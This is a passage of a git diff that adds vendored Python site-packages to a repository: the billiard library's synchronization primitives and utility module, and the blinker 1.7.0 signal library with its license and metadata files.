context.get_spawning_popen().duplicate_for_child(sl.handle) + else: + h = sl.handle + state = (h, sl.kind, sl.maxvalue) + try: + state += (sl.name, ) + except AttributeError: + pass + return state + + def __setstate__(self, state): + self._semlock = _billiard.SemLock._rebuild(*state) + util.debug('recreated blocker with handle %r', state[0]) + self._make_methods() + + @staticmethod + def _make_name(): + return '%s-%s' % (process.current_process()._config['semprefix'], + next(SemLock._rand)) + + +class Semaphore(SemLock): + + def __init__(self, value=1, ctx=None): + SemLock.__init__(self, SEMAPHORE, value, SEM_VALUE_MAX, ctx=ctx) + + def get_value(self): + return self._semlock._get_value() + + def __repr__(self): + try: + value = self._semlock._get_value() + except Exception: + value = 'unknown' + return '<%s(value=%s)>' % (self.__class__.__name__, value) + + +class BoundedSemaphore(Semaphore): + + def __init__(self, value=1, ctx=None): + SemLock.__init__(self, SEMAPHORE, value, value, ctx=ctx) + + def __repr__(self): + try: + value = self._semlock._get_value() + except Exception: + value = 'unknown' + return '<%s(value=%s, maxvalue=%s)>' % ( + self.__class__.__name__, value, 
self._semlock.maxvalue) + + +class Lock(SemLock): + ''' + Non-recursive lock. + ''' + + def __init__(self, ctx=None): + SemLock.__init__(self, SEMAPHORE, 1, 1, ctx=ctx) + + def __repr__(self): + try: + if self._semlock._is_mine(): + name = process.current_process().name + if threading.current_thread().name != 'MainThread': + name += '|' + threading.current_thread().name + elif self._semlock._get_value() == 1: + name = 'None' + elif self._semlock._count() > 0: + name = 'SomeOtherThread' + else: + name = 'SomeOtherProcess' + except Exception: + name = 'unknown' + return '<%s(owner=%s)>' % (self.__class__.__name__, name) + + +class RLock(SemLock): + ''' + Recursive lock + ''' + + def __init__(self, ctx=None): + SemLock.__init__(self, RECURSIVE_MUTEX, 1, 1, ctx=ctx) + + def __repr__(self): + try: + if self._semlock._is_mine(): + name = process.current_process().name + if threading.current_thread().name != 'MainThread': + name += '|' + threading.current_thread().name + count = self._semlock._count() + elif self._semlock._get_value() == 1: + name, count = 'None', 0 + elif self._semlock._count() > 0: + name, count = 'SomeOtherThread', 'nonzero' + else: + name, count = 'SomeOtherProcess', 'nonzero' + except Exception: + name, count = 'unknown', 'unknown' + return '<%s(%s, %s)>' % (self.__class__.__name__, name, count) + + +class Condition: + ''' + Condition variable + ''' + + def __init__(self, lock=None, ctx=None): + assert ctx + self._lock = lock or ctx.RLock() + self._sleeping_count = ctx.Semaphore(0) + self._woken_count = ctx.Semaphore(0) + self._wait_semaphore = ctx.Semaphore(0) + self._make_methods() + + def __getstate__(self): + context.assert_spawning(self) + return (self._lock, self._sleeping_count, + self._woken_count, self._wait_semaphore) + + def __setstate__(self, state): + (self._lock, self._sleeping_count, + self._woken_count, self._wait_semaphore) = state + self._make_methods() + + def __enter__(self): + return self._lock.__enter__() + + def __exit__(self, *args): + return self._lock.__exit__(*args) + + def _make_methods(self): + self.acquire = self._lock.acquire + self.release = self._lock.release + + def __repr__(self): + try: + num_waiters = (self._sleeping_count._semlock._get_value() - + self._woken_count._semlock._get_value()) + except Exception: + num_waiters = 'unknown' + return '<%s(%s, %s)>' % ( + self.__class__.__name__, self._lock, num_waiters) + + def wait(self, timeout=None): + assert self._lock._semlock._is_mine(), \ + 'must acquire() condition before using wait()' + + # indicate that this thread is going to sleep + self._sleeping_count.release() + + # release lock + count = self._lock._semlock._count() + for i in range(count): + self._lock.release() + + try: + # wait for notification or timeout + return self._wait_semaphore.acquire(True, timeout) + finally: + # indicate that this thread has woken + self._woken_count.release() + + # reacquire lock + for i in range(count): + self._lock.acquire() + + def notify(self): + assert self._lock._semlock._is_mine(), 'lock is not owned' + assert not self._wait_semaphore.acquire(False) + + # to take account of timeouts since last notify() we subtract + # woken_count from sleeping_count and rezero woken_count + while self._woken_count.acquire(False): + res = self._sleeping_count.acquire(False) + assert res + + if self._sleeping_count.acquire(False): # try grabbing a sleeper + self._wait_semaphore.release() # wake up one sleeper + self._woken_count.acquire() # wait for sleeper to wake + + # rezero _wait_semaphore in case a timeout 
just happened + self._wait_semaphore.acquire(False) + + def notify_all(self): + assert self._lock._semlock._is_mine(), 'lock is not owned' + assert not self._wait_semaphore.acquire(False) + + # to take account of timeouts since last notify*() we subtract + # woken_count from sleeping_count and rezero woken_count + while self._woken_count.acquire(False): + res = self._sleeping_count.acquire(False) + assert res + + sleepers = 0 + while self._sleeping_count.acquire(False): + self._wait_semaphore.release() # wake up one sleeper + sleepers += 1 + + if sleepers: + for i in range(sleepers): + self._woken_count.acquire() # wait for a sleeper to wake + + # rezero wait_semaphore in case some timeouts just happened + while self._wait_semaphore.acquire(False): + pass + + def wait_for(self, predicate, timeout=None): + result = predicate() + if result: + return result + if timeout is not None: + endtime = monotonic() + timeout + else: + endtime = None + waittime = None + while not result: + if endtime is not None: + waittime = endtime - monotonic() + if waittime <= 0: + break + self.wait(waittime) + result = predicate() + return result + + +class Event: + + def __init__(self, ctx=None): + assert ctx + self._cond = ctx.Condition(ctx.Lock()) + self._flag = ctx.Semaphore(0) + + def is_set(self): + with self._cond: + if self._flag.acquire(False): + self._flag.release() + return True + return False + + def set(self): + with self._cond: + self._flag.acquire(False) + self._flag.release() + self._cond.notify_all() + + def clear(self): + with self._cond: + self._flag.acquire(False) + + def wait(self, timeout=None): + with self._cond: + if self._flag.acquire(False): + self._flag.release() + else: + self._cond.wait(timeout) + + if self._flag.acquire(False): + self._flag.release() + return True + return False + +# +# Barrier +# + + +if hasattr(threading, 'Barrier'): + + class Barrier(threading.Barrier): + + def __init__(self, parties, action=None, timeout=None, ctx=None): + assert ctx + import struct + from .heap import BufferWrapper + wrapper = BufferWrapper(struct.calcsize('i') * 2) + cond = ctx.Condition() + self.__setstate__((parties, action, timeout, cond, wrapper)) + self._state = 0 + self._count = 0 + + def __setstate__(self, state): + (self._parties, self._action, self._timeout, + self._cond, self._wrapper) = state + self._array = self._wrapper.create_memoryview().cast('i') + + def __getstate__(self): + return (self._parties, self._action, self._timeout, + self._cond, self._wrapper) + + @property + def _state(self): + return self._array[0] + + @_state.setter + def _state(self, value): # noqa + self._array[0] = value + + @property + def _count(self): + return self._array[1] + + @_count.setter + def _count(self, value): # noqa + self._array[1] = value + + +else: + + class Barrier: # noqa + + def __init__(self, *args, **kwargs): + raise NotImplementedError('Barrier only supported on Py3') diff --git a/env/Lib/site-packages/billiard/util.py b/env/Lib/site-packages/billiard/util.py new file mode 100644 index 00000000..0fdf2a2c --- /dev/null +++ b/env/Lib/site-packages/billiard/util.py @@ -0,0 +1,232 @@ +# +# Module providing various facilities to other parts of the package +# +# billiard/util.py +# +# Copyright (c) 2006-2008, R Oudkerk --- see COPYING.txt +# Licensed to PSF under a Contributor Agreement. 
+# + +import sys +import errno +import functools +import atexit + +try: + import cffi +except ImportError: + import ctypes + +try: + from subprocess import _args_from_interpreter_flags # noqa +except ImportError: # pragma: no cover + def _args_from_interpreter_flags(): # noqa + """Return a list of command-line arguments reproducing the current + settings in sys.flags and sys.warnoptions.""" + flag_opt_map = { + 'debug': 'd', + 'optimize': 'O', + 'dont_write_bytecode': 'B', + 'no_user_site': 's', + 'no_site': 'S', + 'ignore_environment': 'E', + 'verbose': 'v', + 'bytes_warning': 'b', + 'hash_randomization': 'R', + 'py3k_warning': '3', + } + args = [] + for flag, opt in flag_opt_map.items(): + v = getattr(sys.flags, flag) + if v > 0: + args.append('-' + opt * v) + for opt in sys.warnoptions: + args.append('-W' + opt) + return args + +from multiprocessing.util import ( # noqa + _afterfork_registry, + _afterfork_counter, + _exit_function, + _finalizer_registry, + _finalizer_counter, + Finalize, + ForkAwareLocal, + ForkAwareThreadLock, + get_temp_dir, + is_exiting, + register_after_fork, + _run_after_forkers, + _run_finalizers, +) + +from .compat import get_errno + +__all__ = [ + 'sub_debug', 'debug', 'info', 'sub_warning', 'get_logger', + 'log_to_stderr', 'get_temp_dir', 'register_after_fork', + 'is_exiting', 'Finalize', 'ForkAwareThreadLock', 'ForkAwareLocal', + 'SUBDEBUG', 'SUBWARNING', +] + + +# Constants from prctl.h +PR_GET_PDEATHSIG = 2 +PR_SET_PDEATHSIG = 1 + +# +# Logging +# + +NOTSET = 0 +SUBDEBUG = 5 +DEBUG = 10 +INFO = 20 +SUBWARNING = 25 +WARNING = 30 +ERROR = 40 + +LOGGER_NAME = 'multiprocessing' +DEFAULT_LOGGING_FORMAT = '[%(levelname)s/%(processName)s] %(message)s' + +_logger = None +_log_to_stderr = False + + +def sub_debug(msg, *args, **kwargs): + if _logger: + _logger.log(SUBDEBUG, msg, *args, **kwargs) + + +def debug(msg, *args, **kwargs): + if _logger: + _logger.log(DEBUG, msg, *args, **kwargs) + + +def info(msg, *args, **kwargs): + if _logger: + _logger.log(INFO, msg, *args, **kwargs) + + +def sub_warning(msg, *args, **kwargs): + if _logger: + _logger.log(SUBWARNING, msg, *args, **kwargs) + +def warning(msg, *args, **kwargs): + if _logger: + _logger.log(WARNING, msg, *args, **kwargs) + +def error(msg, *args, **kwargs): + if _logger: + _logger.log(ERROR, msg, *args, **kwargs) + + +def get_logger(): + ''' + Returns logger used by multiprocessing + ''' + global _logger + import logging + + logging._acquireLock() + try: + if not _logger: + + _logger = logging.getLogger(LOGGER_NAME) + _logger.propagate = 0 + logging.addLevelName(SUBDEBUG, 'SUBDEBUG') + logging.addLevelName(SUBWARNING, 'SUBWARNING') + + # XXX multiprocessing should cleanup before logging + if hasattr(atexit, 'unregister'): + atexit.unregister(_exit_function) + atexit.register(_exit_function) + else: + atexit._exithandlers.remove((_exit_function, (), {})) + atexit._exithandlers.append((_exit_function, (), {})) + finally: + logging._releaseLock() + + return _logger + + +def log_to_stderr(level=None): + ''' + Turn on logging and add a handler which prints to stderr + ''' + global _log_to_stderr + import logging + + logger = get_logger() + formatter = logging.Formatter(DEFAULT_LOGGING_FORMAT) + handler = logging.StreamHandler() + handler.setFormatter(formatter) + logger.addHandler(handler) + + if level: + logger.setLevel(level) + _log_to_stderr = True + return _logger + + +def get_pdeathsig(): + """ + Return the current value of the parent process death signal + """ + if not sys.platform.startswith('linux'): + # 
currently we support only linux platform. + raise OSError() + try: + if 'cffi' in sys.modules: + ffi = cffi.FFI() + ffi.cdef("int prctl (int __option, ...);") + arg = ffi.new("int *") + C = ffi.dlopen(None) + C.prctl(PR_GET_PDEATHSIG, arg) + return arg[0] + else: + sig = ctypes.c_int() + libc = ctypes.cdll.LoadLibrary("libc.so.6") + libc.prctl(PR_GET_PDEATHSIG, ctypes.byref(sig)) + return sig.value + except Exception: + raise OSError() + + +def set_pdeathsig(sig): + """ + Set the parent process death signal of the calling process to sig + (either a signal value in the range 1..maxsig, or 0 to clear). + This is the signal that the calling process will get when its parent dies. + This value is cleared for the child of a fork(2) and + (since Linux 2.4.36 / 2.6.23) when executing a set-user-ID or set-group-ID binary. + """ + if not sys.platform.startswith('linux'): + # currently we support only linux platform. + raise OSError("pdeathsig is only supported on linux") + try: + if 'cffi' in sys.modules: + ffi = cffi.FFI() + ffi.cdef("int prctl (int __option, ...);") + C = ffi.dlopen(None) + C.prctl(PR_SET_PDEATHSIG, ffi.cast("int", sig)) + else: + libc = ctypes.cdll.LoadLibrary("libc.so.6") + libc.prctl(PR_SET_PDEATHSIG, ctypes.c_int(sig)) + except Exception as e: + raise OSError("An error occured while setting pdeathsig") from e + +def _eintr_retry(func): + ''' + Automatic retry after EINTR. + ''' + + @functools.wraps(func) + def wrapped(*args, **kwargs): + while 1: + try: + return func(*args, **kwargs) + except OSError as exc: + if get_errno(exc) != errno.EINTR: + raise + return wrapped diff --git a/env/Lib/site-packages/blinker-1.7.0.dist-info/INSTALLER b/env/Lib/site-packages/blinker-1.7.0.dist-info/INSTALLER new file mode 100644 index 00000000..a1b589e3 --- /dev/null +++ b/env/Lib/site-packages/blinker-1.7.0.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/env/Lib/site-packages/blinker-1.7.0.dist-info/LICENSE.rst b/env/Lib/site-packages/blinker-1.7.0.dist-info/LICENSE.rst new file mode 100644 index 00000000..79c9825a --- /dev/null +++ b/env/Lib/site-packages/blinker-1.7.0.dist-info/LICENSE.rst @@ -0,0 +1,20 @@ +Copyright 2010 Jason Kirtland + +Permission is hereby granted, free of charge, to any person obtaining a +copy of this software and associated documentation files (the +"Software"), to deal in the Software without restriction, including +without limitation the rights to use, copy, modify, merge, publish, +distribute, sublicense, and/or sell copies of the Software, and to +permit persons to whom the Software is furnished to do so, subject to +the following conditions: + +The above copyright notice and this permission notice shall be included +in all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS +OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF +MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. +IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY +CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, +TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE +SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 
diff --git a/env/Lib/site-packages/blinker-1.7.0.dist-info/METADATA b/env/Lib/site-packages/blinker-1.7.0.dist-info/METADATA new file mode 100644 index 00000000..f96613c4 --- /dev/null +++ b/env/Lib/site-packages/blinker-1.7.0.dist-info/METADATA @@ -0,0 +1,62 @@ +Metadata-Version: 2.1 +Name: blinker +Version: 1.7.0 +Summary: Fast, simple object-to-object and broadcast signaling +Keywords: signal,emit,events,broadcast +Author-email: Jason Kirtland +Maintainer-email: Pallets Ecosystem +Requires-Python: >=3.8 +Description-Content-Type: text/x-rst +Classifier: Development Status :: 5 - Production/Stable +Classifier: Intended Audience :: Developers +Classifier: License :: OSI Approved :: MIT License +Classifier: Operating System :: OS Independent +Classifier: Programming Language :: Python +Classifier: Topic :: Software Development :: Libraries +Project-URL: Chat, https://discord.gg/pallets +Project-URL: Documentation, https://blinker.readthedocs.io +Project-URL: Homepage, https://blinker.readthedocs.io +Project-URL: Issue Tracker, https://github.com/pallets-eco/blinker/issues/ +Project-URL: Source Code, https://github.com/pallets-eco/blinker/ + +Blinker +======= + +Blinker provides a fast dispatching system that allows any number of +interested parties to subscribe to events, or "signals". + +Signal receivers can subscribe to specific senders or receive signals +sent by any sender. + +.. code-block:: pycon + + >>> from blinker import signal + >>> started = signal('round-started') + >>> def each(round): + ... print(f"Round {round}") + ... + >>> started.connect(each) + + >>> def round_two(round): + ... print("This is round two.") + ... + >>> started.connect(round_two, sender=2) + + >>> for round in range(1, 4): + ... started.send(round) + ... + Round 1! + Round 2! + This is round two. + Round 3! 
+ + +Links +----- + +- Documentation: https://blinker.readthedocs.io/ +- Changes: https://blinker.readthedocs.io/#changes +- PyPI Releases: https://pypi.org/project/blinker/ +- Source Code: https://github.com/pallets-eco/blinker/ +- Issue Tracker: https://github.com/pallets-eco/blinker/issues/ + diff --git a/env/Lib/site-packages/blinker-1.7.0.dist-info/RECORD b/env/Lib/site-packages/blinker-1.7.0.dist-info/RECORD new file mode 100644 index 00000000..33cf5dc0 --- /dev/null +++ b/env/Lib/site-packages/blinker-1.7.0.dist-info/RECORD @@ -0,0 +1,14 @@ +blinker-1.7.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +blinker-1.7.0.dist-info/LICENSE.rst,sha256=nrc6HzhZekqhcCXSrhvjg5Ykx5XphdTw6Xac4p-spGc,1054 +blinker-1.7.0.dist-info/METADATA,sha256=kDgzPgrw4he78pEX88bSAqwYMVWrfUMk8QmNjekjg_U,1918 +blinker-1.7.0.dist-info/RECORD,, +blinker-1.7.0.dist-info/WHEEL,sha256=EZbGkh7Ie4PoZfRQ8I0ZuP9VklN_TvcZ6DSE5Uar4z4,81 +blinker/__init__.py,sha256=s75XaRDHwSDzZ21BZUOEkQDQIcQEyT8hT7vk3EhYFQU,408 +blinker/__pycache__/__init__.cpython-310.pyc,, +blinker/__pycache__/_saferef.cpython-310.pyc,, +blinker/__pycache__/_utilities.cpython-310.pyc,, +blinker/__pycache__/base.cpython-310.pyc,, +blinker/_saferef.py,sha256=kWOTIWnCY3kOb8lZP74Rbx7bR_BLVg4TjwzNCRLhKHs,9096 +blinker/_utilities.py,sha256=S2njKDmlBpK_yCK4RT8hq98hEj30I0TQCC5mNhtY22I,2856 +blinker/base.py,sha256=FqZmAI5YzuRrvRmye1Jb-utyVOjXtF5vUVP3-1u-HtU,20544 +blinker/py.typed,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 diff --git a/env/Lib/site-packages/blinker-1.7.0.dist-info/WHEEL b/env/Lib/site-packages/blinker-1.7.0.dist-info/WHEEL new file mode 100644 index 00000000..3b5e64b5 --- /dev/null +++ b/env/Lib/site-packages/blinker-1.7.0.dist-info/WHEEL @@ -0,0 +1,4 @@ +Wheel-Version: 1.0 +Generator: flit 3.9.0 +Root-Is-Purelib: true +Tag: py3-none-any diff --git a/env/Lib/site-packages/blinker/__init__.py b/env/Lib/site-packages/blinker/__init__.py new file mode 100644 index 00000000..d014caa0 --- /dev/null +++ b/env/Lib/site-packages/blinker/__init__.py @@ -0,0 +1,19 @@ +from blinker.base import ANY +from blinker.base import NamedSignal +from blinker.base import Namespace +from blinker.base import receiver_connected +from blinker.base import Signal +from blinker.base import signal +from blinker.base import WeakNamespace + +__all__ = [ + "ANY", + "NamedSignal", + "Namespace", + "Signal", + "WeakNamespace", + "receiver_connected", + "signal", +] + +__version__ = "1.7.0" diff --git a/env/Lib/site-packages/blinker/_saferef.py b/env/Lib/site-packages/blinker/_saferef.py new file mode 100644 index 00000000..dcb70c18 --- /dev/null +++ b/env/Lib/site-packages/blinker/_saferef.py @@ -0,0 +1,230 @@ +# extracted from Louie, http://pylouie.org/ +# updated for Python 3 +# +# Copyright (c) 2006 Patrick K. O'Brien, Mike C. Fletcher, +# Matthew R. Scott +# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions are +# met: +# +# * Redistributions of source code must retain the above copyright +# notice, this list of conditions and the following disclaimer. +# +# * Redistributions in binary form must reproduce the above +# copyright notice, this list of conditions and the following +# disclaimer in the documentation and/or other materials provided +# with the distribution. +# +# * Neither the name of the nor the names of its +# contributors may be used to endorse or promote products derived +# from this software without specific prior written permission. 
+# +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR +# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT +# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, +# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT +# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, +# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY +# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT +# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. +# +"""Refactored 'safe reference from dispatcher.py""" +import operator +import sys +import traceback +import weakref + + +get_self = operator.attrgetter("__self__") +get_func = operator.attrgetter("__func__") + + +def safe_ref(target, on_delete=None): + """Return a *safe* weak reference to a callable target. + + - ``target``: The object to be weakly referenced, if it's a bound + method reference, will create a BoundMethodWeakref, otherwise + creates a simple weakref. + + - ``on_delete``: If provided, will have a hard reference stored to + the callable to be called after the safe reference goes out of + scope with the reference object, (either a weakref or a + BoundMethodWeakref) as argument. + """ + try: + im_self = get_self(target) + except AttributeError: + if callable(on_delete): + return weakref.ref(target, on_delete) + else: + return weakref.ref(target) + else: + if im_self is not None: + # Turn a bound method into a BoundMethodWeakref instance. + # Keep track of these instances for lookup by disconnect(). + assert hasattr(target, "im_func") or hasattr(target, "__func__"), ( + f"safe_ref target {target!r} has im_self, but no im_func, " + "don't know how to create reference" + ) + reference = BoundMethodWeakref(target=target, on_delete=on_delete) + return reference + + +class BoundMethodWeakref: + """'Safe' and reusable weak references to instance methods. + + BoundMethodWeakref objects provide a mechanism for referencing a + bound method without requiring that the method object itself + (which is normally a transient object) is kept alive. Instead, + the BoundMethodWeakref object keeps weak references to both the + object and the function which together define the instance method. + + Attributes: + + - ``key``: The identity key for the reference, calculated by the + class's calculate_key method applied to the target instance method. + + - ``deletion_methods``: Sequence of callable objects taking single + argument, a reference to this object which will be called when + *either* the target object or target function is garbage + collected (i.e. when this object becomes invalid). These are + specified as the on_delete parameters of safe_ref calls. + + - ``weak_self``: Weak reference to the target object. + + - ``weak_func``: Weak reference to the target function. + + Class Attributes: + + - ``_all_instances``: Class attribute pointing to all live + BoundMethodWeakref objects indexed by the class's + calculate_key(target) method applied to the target objects. + This weak value dictionary is used to short-circuit creation so + that multiple references to the same (object, function) pair + produce the same BoundMethodWeakref instance. 
+ """ + + _all_instances = weakref.WeakValueDictionary() # type: ignore[var-annotated] + + def __new__(cls, target, on_delete=None, *arguments, **named): + """Create new instance or return current instance. + + Basically this method of construction allows us to + short-circuit creation of references to already-referenced + instance methods. The key corresponding to the target is + calculated, and if there is already an existing reference, + that is returned, with its deletion_methods attribute updated. + Otherwise the new instance is created and registered in the + table of already-referenced methods. + """ + key = cls.calculate_key(target) + current = cls._all_instances.get(key) + if current is not None: + current.deletion_methods.append(on_delete) + return current + else: + base = super().__new__(cls) + cls._all_instances[key] = base + base.__init__(target, on_delete, *arguments, **named) + return base + + def __init__(self, target, on_delete=None): + """Return a weak-reference-like instance for a bound method. + + - ``target``: The instance-method target for the weak reference, + must have im_self and im_func attributes and be + reconstructable via the following, which is true of built-in + instance methods:: + + target.im_func.__get__( target.im_self ) + + - ``on_delete``: Optional callback which will be called when + this weak reference ceases to be valid (i.e. either the + object or the function is garbage collected). Should take a + single argument, which will be passed a pointer to this + object. + """ + + def remove(weak, self=self): + """Set self.isDead to True when method or instance is destroyed.""" + methods = self.deletion_methods[:] + del self.deletion_methods[:] + try: + del self.__class__._all_instances[self.key] + except KeyError: + pass + for function in methods: + try: + if callable(function): + function(self) + except Exception: + try: + traceback.print_exc() + except AttributeError: + e = sys.exc_info()[1] + print( + f"Exception during saferef {self} " + f"cleanup function {function}: {e}" + ) + + self.deletion_methods = [on_delete] + self.key = self.calculate_key(target) + im_self = get_self(target) + im_func = get_func(target) + self.weak_self = weakref.ref(im_self, remove) + self.weak_func = weakref.ref(im_func, remove) + self.self_name = str(im_self) + self.func_name = str(im_func.__name__) + + @classmethod + def calculate_key(cls, target): + """Calculate the reference key for this reference. + + Currently this is a two-tuple of the id()'s of the target + object and the target function respectively. + """ + return (id(get_self(target)), id(get_func(target))) + + def __str__(self): + """Give a friendly representation of the object.""" + return "{}({}.{})".format( + self.__class__.__name__, + self.self_name, + self.func_name, + ) + + __repr__ = __str__ + + def __hash__(self): + return hash((self.self_name, self.key)) + + def __nonzero__(self): + """Whether we are still a valid reference.""" + return self() is not None + + def __eq__(self, other): + """Compare with another reference.""" + if not isinstance(other, self.__class__): + return operator.eq(self.__class__, type(other)) + return operator.eq(self.key, other.key) + + def __call__(self): + """Return a strong reference to the bound method. + + If the target cannot be retrieved, then will return None, + otherwise returns a bound instance method for our object and + function. + + Note: You may call this method any number of times, as it does + not invalidate the reference. 
+ """ + target = self.weak_self() + if target is not None: + function = self.weak_func() + if function is not None: + return function.__get__(target) + return None diff --git a/env/Lib/site-packages/blinker/_utilities.py b/env/Lib/site-packages/blinker/_utilities.py new file mode 100644 index 00000000..4b711c67 --- /dev/null +++ b/env/Lib/site-packages/blinker/_utilities.py @@ -0,0 +1,105 @@ +from __future__ import annotations + +import typing as t +from weakref import ref + +from blinker._saferef import BoundMethodWeakref + +IdentityType = t.Union[t.Tuple[int, int], str, int] + + +class _symbol: + def __init__(self, name): + """Construct a new named symbol.""" + self.__name__ = self.name = name + + def __reduce__(self): + return symbol, (self.name,) + + def __repr__(self): + return self.name + + +_symbol.__name__ = "symbol" + + +class symbol: + """A constant symbol. + + >>> symbol('foo') is symbol('foo') + True + >>> symbol('foo') + foo + + A slight refinement of the MAGICCOOKIE=object() pattern. The primary + advantage of symbol() is its repr(). They are also singletons. + + Repeated calls of symbol('name') will all return the same instance. + + """ + + symbols = {} # type: ignore[var-annotated] + + def __new__(cls, name): + try: + return cls.symbols[name] + except KeyError: + return cls.symbols.setdefault(name, _symbol(name)) + + +def hashable_identity(obj: object) -> IdentityType: + if hasattr(obj, "__func__"): + return (id(obj.__func__), id(obj.__self__)) # type: ignore[attr-defined] + elif hasattr(obj, "im_func"): + return (id(obj.im_func), id(obj.im_self)) # type: ignore[attr-defined] + elif isinstance(obj, (int, str)): + return obj + else: + return id(obj) + + +WeakTypes = (ref, BoundMethodWeakref) + + +class annotatable_weakref(ref): + """A weakref.ref that supports custom instance attributes.""" + + receiver_id: t.Optional[IdentityType] + sender_id: t.Optional[IdentityType] + + +def reference( # type: ignore[no-untyped-def] + object, callback=None, **annotations +) -> annotatable_weakref: + """Return an annotated weak ref.""" + if callable(object): + weak = callable_reference(object, callback) + else: + weak = annotatable_weakref(object, callback) + for key, value in annotations.items(): + setattr(weak, key, value) + return weak # type: ignore[no-any-return] + + +def callable_reference(object, callback=None): + """Return an annotated weak ref, supporting bound instance methods.""" + if hasattr(object, "im_self") and object.im_self is not None: + return BoundMethodWeakref(target=object, on_delete=callback) + elif hasattr(object, "__self__") and object.__self__ is not None: + return BoundMethodWeakref(target=object, on_delete=callback) + return annotatable_weakref(object, callback) + + +class lazy_property: + """A @property that is only evaluated once.""" + + def __init__(self, deferred): + self._deferred = deferred + self.__doc__ = deferred.__doc__ + + def __get__(self, obj, cls): + if obj is None: + return self + value = self._deferred(obj) + setattr(obj, self._deferred.__name__, value) + return value diff --git a/env/Lib/site-packages/blinker/base.py b/env/Lib/site-packages/blinker/base.py new file mode 100644 index 00000000..b9d70358 --- /dev/null +++ b/env/Lib/site-packages/blinker/base.py @@ -0,0 +1,558 @@ +"""Signals and events. + +A small implementation of signals, inspired by a snippet of Django signal +API client code seen in a blog post. Signals are first-class objects and +each manages its own receivers and message emission. 
+ +The :func:`signal` function provides singleton behavior for named signals. + +""" +from __future__ import annotations + +import typing as t +from collections import defaultdict +from contextlib import contextmanager +from inspect import iscoroutinefunction +from warnings import warn +from weakref import WeakValueDictionary + +from blinker._utilities import annotatable_weakref +from blinker._utilities import hashable_identity +from blinker._utilities import IdentityType +from blinker._utilities import lazy_property +from blinker._utilities import reference +from blinker._utilities import symbol +from blinker._utilities import WeakTypes + +if t.TYPE_CHECKING: + import typing_extensions as te + + T_callable = t.TypeVar("T_callable", bound=t.Callable[..., t.Any]) + + T = t.TypeVar("T") + P = te.ParamSpec("P") + + AsyncWrapperType = t.Callable[[t.Callable[P, t.Awaitable[T]]], t.Callable[P, T]] + SyncWrapperType = t.Callable[[t.Callable[P, T]], t.Callable[P, t.Awaitable[T]]] + +ANY = symbol("ANY") +ANY.__doc__ = 'Token for "any sender".' +ANY_ID = 0 + +# NOTE: We need a reference to cast for use in weakref callbacks otherwise +# t.cast may have already been set to None during finalization. +cast = t.cast + + +class Signal: + """A notification emitter.""" + + #: An :obj:`ANY` convenience synonym, allows ``Signal.ANY`` + #: without an additional import. + ANY = ANY + + set_class: type[set] = set + + @lazy_property + def receiver_connected(self) -> Signal: + """Emitted after each :meth:`connect`. + + The signal sender is the signal instance, and the :meth:`connect` + arguments are passed through: *receiver*, *sender*, and *weak*. + + .. versionadded:: 1.2 + + """ + return Signal(doc="Emitted after a receiver connects.") + + @lazy_property + def receiver_disconnected(self) -> Signal: + """Emitted after :meth:`disconnect`. + + The sender is the signal instance, and the :meth:`disconnect` arguments + are passed through: *receiver* and *sender*. + + Note, this signal is emitted **only** when :meth:`disconnect` is + called explicitly. + + The disconnect signal can not be emitted by an automatic disconnect + (due to a weakly referenced receiver or sender going out of scope), + as the receiver and/or sender instances are no longer available for + use at the time this signal would be emitted. + + An alternative approach is available by subscribing to + :attr:`receiver_connected` and setting up a custom weakref cleanup + callback on weak receivers and senders. + + .. versionadded:: 1.2 + + """ + return Signal(doc="Emitted after a receiver disconnects.") + + def __init__(self, doc: str | None = None) -> None: + """ + :param doc: optional. If provided, will be assigned to the signal's + __doc__ attribute. + + """ + if doc: + self.__doc__ = doc + #: A mapping of connected receivers. + #: + #: The values of this mapping are not meaningful outside of the + #: internal :class:`Signal` implementation, however the boolean value + #: of the mapping is useful as an extremely efficient check to see if + #: any receivers are connected to the signal. 
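+        #: (:meth:`send` relies on that same truthiness check before doing
+        #: any per-sender lookup, so sends on an empty signal stay cheap.)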
